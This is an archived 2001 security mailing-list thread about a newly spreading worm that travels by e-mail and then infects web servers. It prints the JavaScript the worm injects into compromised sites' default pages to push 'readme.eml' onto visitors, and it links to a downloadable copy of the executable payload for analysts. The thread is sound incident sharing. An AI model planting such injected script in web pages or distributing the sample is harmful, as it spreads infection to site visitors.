RE: New "concept" virus/worm?

From: Guillaume TARRARE (gtarrareat_private)
Date: Tue Sep 18 2001 - 10:51:33 PDT

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    The code written in the default page of a compromised server :
    
    <html><script language="JavaScript">window.open("readme.eml", null,
    "resizable=no,top=6000,left=6000")</script></html>
    
    ....
    
    
    
    -----Message d'origine-----
    De : Jay D. Dyson [mailto:jdysonat_private]
    Envoye : mardi 18 septembre 2001 18:21
    A : Incidents List
    Cc : Vuln Dev
    Objet : Re: New "concept" virus/worm?
    
    
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    On Tue, 18 Sep 2001, Joao Gouveia wrote:
    
    > I kept the executables for analysis, if anyone woud like to take a look,
    > drop me an email.
    
    	Anyone interested in examining the payload can also pick up a copy
    at http://www.treachery.net/~jdyson/worms/readme.exe (MD5 hash of the
    payload is at http://www.treachery.net/~jdyson/worms/readme.exe.md5).
    
    > So, what I ask is, does anyone know about this worm?  I've done a quick
    > search for it and couldn't find nothing like it.
    
    	It's a two-prong worm.  It appears to be primarily disseminated
    via e-mail, and then launches its attacks on web hosts upon successful
    infection.
    
    - -Jay
    
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     `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'
    
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